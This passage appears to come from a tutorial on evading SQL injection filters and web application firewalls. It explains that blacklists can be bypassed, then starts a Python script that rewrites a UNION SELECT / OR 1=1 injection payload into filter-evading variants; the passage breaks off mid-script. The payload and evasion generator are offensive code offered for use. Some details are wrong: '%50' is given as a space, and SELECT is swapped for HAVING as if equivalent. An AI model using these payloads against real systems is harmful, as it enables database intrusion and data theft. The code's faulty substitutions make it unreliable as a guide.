One method of halting SQL Injection is filtering through either server side text manipulation or
Web App Firewalls (WAFs). These systems target specific phrases commonly associated with attacks such as SELECT, AND, OR, and spaces. These can be easily evaded by replacing these values with less obvious ones, thus highlighting the issue with blacklists in general.
We will create a script that takes attack strings, looks for potentially escaped strings, and provides alternative attack strings.
The following is our script:
subs = []
values = {“ “: “%50”, “SELECT”: “HAVING”, “AND”: “&&”, “OR”: “||”}
originalstring = “' UNION SELECT * FROM Users WHERE username = 'admin' OR 1=1 AND username = 'admin';#”
secondoriginalstring = originalstring
for key, value in values.iteritems():
if key in originalstring:
newstring = originalstring.replace(key, value)
subs.append(newstring)
if key in secondoriginalstring:
secondoriginalstring = secondoriginalstring...